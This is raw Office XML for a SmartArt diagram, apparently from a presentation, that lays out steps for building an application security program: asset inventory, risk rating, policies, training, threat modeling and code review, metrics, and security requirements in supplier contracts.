    <dgm:cxn modelId="{5368E3A4-753E-674F-8CE6-22C51467BAEB}" type="presOf" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{34810BA8-ABE6-4135-9DA7-66092273C67F}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938}" srcOrd="2" destOrd="0" parTransId="{918768C3-D12F-4161-B487-A57F29898241}" sibTransId="{2411AEFD-A010-4099-9F18-B1617D3A6C02}"/>
    <dgm:cxn modelId="{E2BFD8A9-22B4-1240-BF50-4B01A6E7275B}" type="presOf" srcId="{6280EA87-E46C-40B8-91EF-12C1C27B37A0}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2B332EAB-1224-4EC7-902F-FB64603358D2}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{FB9F0EAE-C91F-4A65-B43A-46392ED38733}" srcOrd="2" destOrd="0" parTransId="{DA9F1A23-7ABB-43F5-841D-3D2FC9925CFB}" sibTransId="{E2D6A2A1-5438-4DC5-806B-70724658813A}"/>
    <dgm:cxn modelId="{48311AAE-790D-405B-BEB3-7AB59042F49A}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77}" srcOrd="4" destOrd="0" parTransId="{899E3CF7-9D0C-4165-A610-81A1077E783C}" sibTransId="{9AA1C047-7E86-43E3-AA24-C92B3BC7E34B}"/>
    <dgm:cxn modelId="{0EBC86B2-1B2E-D743-B1FC-2B9051176604}" type="presOf" srcId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{69EE8DB2-9B40-A74C-B13B-F75E364BF485}" type="presOf" srcId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{787CB7B5-E746-6047-BB7E-D4FE8ECA58C5}" type="presOf" srcId="{495252AF-5996-4B38-A1EE-B648650A10A0}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AF2510C7-6052-8541-A135-695302800E06}" type="presOf" srcId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{769E66C8-4148-2240-9F82-F8B9B86E9AD9}" type="presOf" srcId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3DC27ECB-9A01-3146-9464-C901F1385240}" type="presOf" srcId="{6CD4BB62-D241-46BC-9B32-86E2CC12748D}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DE5646CC-F144-493B-9414-C6346E590FF4}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{719FD505-9C05-4301-8C8D-24A4329404ED}" srcOrd="1" destOrd="0" parTransId="{423C079E-E5CB-4C54-9E97-54ADA0F45BF5}" sibTransId="{595F5683-5B41-4144-8717-8475FEB51759}"/>
    <dgm:cxn modelId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" srcOrd="2" destOrd="0" parTransId="{3E44837D-D7DC-4906-821E-A6950790F46F}" sibTransId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}"/>
    <dgm:cxn modelId="{BDA0A2DB-50A7-9E41-8394-C10237C43F67}" type="presOf" srcId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A994FEDD-5A8E-480B-AEF6-E54256EA5D11}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{E38DBA4E-1590-4E8F-92F2-04F18E552021}" srcOrd="1" destOrd="0" parTransId="{4707E43C-0E63-42FE-96E7-6097CEC31A66}" sibTransId="{9E962D11-84F0-4781-87CC-1DC58D8334B3}"/>
    <dgm:cxn modelId="{078F00E1-EAB6-A043-AFB5-E1656B653584}" type="presOf" srcId="{60779E52-CC5F-4109-9E02-C8F73324C37D}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6E692FED-4175-4B9A-9596-6BB5008D4D8A}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{6280EA87-E46C-40B8-91EF-12C1C27B37A0}" srcOrd="0" destOrd="0" parTransId="{C08C42A3-E914-4795-97F3-69296AA3F73D}" sibTransId="{F7DE2A44-A11B-4BC7-BC1B-F6D335D0C9F6}"/>
    <dgm:cxn modelId="{FF00CEEE-F35C-9546-AC8A-68AC5AFF469D}" type="presOf" srcId="{38353036-4B60-4F8B-ACD2-5B049C807A9A}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D65047F2-7ED0-4B12-AB6C-8717B38C49DE}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}" srcOrd="2" destOrd="0" parTransId="{97196C37-2225-4EC0-AD9D-ED9EDDE36B2E}" sibTransId="{5B6FED2A-CCAD-4150-BE86-460500775F70}"/>
    <dgm:cxn modelId="{DB4CA1F8-15B9-3A4B-B718-7A58463FABD6}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8996A8FB-24E4-B049-9B18-D49F709DEB3F}" type="presOf" srcId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}" srcOrd="0" destOrd="0" parTransId="{CEDD41B6-F9E9-4738-8190-4FA86636363D}" sibTransId="{F38BA272-2C4D-4E72-B1E6-C51DCA074847}"/>
    <dgm:cxn modelId="{EFC497FF-F4BF-8A4D-BB9C-FEC4EE7DF41E}" type="presOf" srcId="{657D5226-6628-4A3D-87F9-833B7666A7A2}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1B9CEEEF-B590-6546-A8FA-65481850F03B}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4EE10CB5-4BE3-1C45-8240-2E12B2E1802E}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D2B1083B-7A29-7B43-BA2C-2184545B228D}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6BA3A7E3-E84F-4345-B611-4F05B37E9766}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{805C12C8-02B1-D44E-ACA5-33DE72B5354E}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2571DEAF-E7E1-9544-988F-2794B0561896}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E85F539A-BC24-A643-8A82-74E0A248E796}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2D4DA5FB-B685-2840-95AF-EED70A5E76DC}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{54EB2D14-F3B8-884A-9CCE-27337A269EEC}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F12356CA-3059-A643-BF4A-B03AB991DBB7}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F8713194-CCEE-F442-95F1-F9A554AF2696}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{60D65AF9-BF19-404F-A306-5E33BBA4E8AD}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0CFAEE97-93B4-2641-B56D-FE9B117A0790}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8487FD00-89CD-BB4E-9B87-B88C12D99039}" type="presParOf" srcId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" destId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{714ABA64-4921-5E43-A5A7-2F2032C9B7DF}" type="presParOf" srcId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B8C4920A-1372-D948-950F-46AE477CC44D}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7F2930EF-2282-4737-B8ED-0133EE5AB8BC}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4885C4A3-6CAC-4448-BF35-F04DF081AB89}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3A56FA47-AFF8-384F-91A7-E539DD5E74B8}" type="presParOf" srcId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A5271366-05D0-3D44-B41D-921B4E83A7B4}" type="presParOf" srcId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5FC118EC-9B14-A947-BF90-36342C9C22EE}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{78713489-5D47-416E-ADAE-302406F812AE}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{54A92ACA-A4B5-D446-9BDC-8335A6E24387}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6BA50C33-B6A2-B64E-99A4-4FA9C6D44B62}" type="presParOf" srcId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" destId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DF919368-C128-834B-B8DF-417D170C0CB6}" type="presParOf" srcId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}"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4270079" y="-2197726"/>
          <a:ext cx="1088474"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en-US" sz="95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Document all applications and associated data assets. Larger organizations should consider implementing a Configuration Management Database (CMDB) for this purpose</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950" kern="1200" noProof="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22275">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Establish an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application security program</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and drive adoption. </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="422275">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Conduct a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2"/>
            </a:rPr>
            <a:t>capability gap analysis comparing your organization to your peers</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to define key</a:t>
          </a:r>
          <a:b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b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improvement areas and an execution plan. </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="422275">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Gain management approval and establish an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3"/>
            </a:rPr>
            <a:t>application security awareness campaign</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for the entire IT organization.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2087675" y="90948"/>
        <a:ext cx="5453282" cy="982204"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="994"/>
          <a:ext cx="941833" cy="1162110"/>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90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pP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Get Started</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138683" y="46970"/>
        <a:ext cx="849881" cy="1070158"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4307988" y="-971242"/>
          <a:ext cx="1006776"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Identify </a:t>
          </a:r>
          <a:r>
            <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rPr>
            <a:t>the </a:t>
          </a:r>
          <a:r>
            <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protection needs</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rPr>
            <a:t>of your </a:t>
          </a:r>
          <a:r>
            <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application portfolio</a:t>
          </a:r>
          <a:r>
            <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rPr>
            <a:t> from a business perspective.</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This should be driven in part by privacy laws and other regulations relevant to the data asset being protected. </a:t>
          </a:r>
          <a:endPar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Establish a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5"/>
            </a:rPr>
            <a:t>common risk rating model</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with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk. </a:t>
          </a:r>
          <a:endPar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Accordingly measure and prioritize all your applications and APIs. Add the results to your CMDB. </a:t>
          </a:r>
          <a:endPar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Establish assurance guidelines to properly define coverage and level of rigor required.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2080747" y="1354293"/>
        <a:ext cx="5461258" cy="908482"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="1228142"/>
          <a:ext cx="938893" cy="116078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Risk Based Portfolio Approach</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138540" y="1273975"/>
        <a:ext cx="847227" cy="1069117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4285792" y="255398"/>
          <a:ext cx="1051168"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Establish a set of focused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6"/>
            </a:rPr>
            <a:t>policies and standards</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that provide an application security baseline for all development teams to adhere to.</a:t>
          </a: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Define a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7"/>
            </a:rPr>
            <a:t>common set of reusable security controls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that complement these policies and standards and provide design and development guidance on their use.</a:t>
          </a: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Establish an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8"/>
            </a:rPr>
            <a:t>application security training curriculum</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that is required and targeted to different</a:t>
          </a:r>
          <a:b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b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development roles and topics.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2082914" y="2560904"/>
        <a:ext cx="5456924" cy="948540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="2453963"/>
          <a:ext cx="938893" cy="116242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Enable with a Strong Foundation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138540" y="2499796"/>
        <a:ext cx="847227" cy="1070756"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4406643" y="1496009"/>
          <a:ext cx="809466"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Define and integrate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9"/>
            </a:rPr>
            <a:t>secure implementation</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and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0"/>
            </a:rPr>
            <a:t>verification</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activities into existing development and operational processes. Activities include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1"/>
            </a:rPr>
            <a:t>threat modeling</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secure design and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2"/>
            </a:rPr>
            <a:t>design review</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secure coding and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3"/>
            </a:rPr>
            <a:t>code review</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4"/>
            </a:rPr>
            <a:t>penetration testing</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and remediation.</a:t>
          </a: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Provide subject matter experts and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5"/>
            </a:rPr>
            <a:t>support services for development and project teams</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to be successful.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2071115" y="3910567"/>
        <a:ext cx="5480522" cy="730436"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="3681423"/>
          <a:ext cx="938893" cy="118872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Integrate Security into Existing Processes</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138540" y="3727256"/>
        <a:ext cx="847227" cy="1097057"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4280454" y="2735319"/>
          <a:ext cx="1061845"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Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis data captured. Metrics include adherence to security practices and activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</a:t>
          </a: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Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise.</a:t>
          </a:r>
          <a:b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b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Learn from mistakes and offer positive incentives to promote improvements.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2083436" y="5036007"/>
        <a:ext cx="5455882" cy="958175"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="4935184"/>
          <a:ext cx="938893" cy="1159820"/>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endParaRPr lang="en-US" sz="1050" b="1"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a:off x="1138540" y="4981017"/>
        <a:ext cx="847227" cy="10681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3559351" y="-2227576"/>
          <a:ext cx="855279"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Collect and negotiate the business requirements for an application with the business, including the</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-AU" sz="900" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-AU" sz="900" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>protection requirements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with</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> regard to confidentiality,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authenticity</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="120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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>integrity and availability of all data assets, and the expected business logic.</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Compile the technical requirements including functional and nonfunctional security requirements.</a:t>
          </a:r>
          <a:endParaRPr lang="en-AU"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Plan and negotiate the budget that covers all aspects of design, build, testing and operation, including security activities.</a:t>
          </a:r>
          <a:endParaRPr lang="en-AU" sz="900"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13588" y="101689"/>
        <a:ext cx="5346805" cy="771777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="1761"/>
          <a:ext cx="1115983" cy="97163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90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>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Requirements and Resource Management</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="203285" y="49192"/>
        <a:ext cx="1021121" cy="876770"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3469548" y="-1103740"/>
          <a:ext cx="1034887"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400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Negotiate the requirements with internal or external developers, including guidelines and security requirements with respect to your security program, e.g. SDLC, best practices.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Rate the fulfillment of all technical requirements, including a planning and design phase.</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Negotiate all technical requirements, including design, security, and service level agreements (SLA).</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dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Adopt templates and checklists, such as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>OWASP Secure Software Contract Annex</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-AU" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
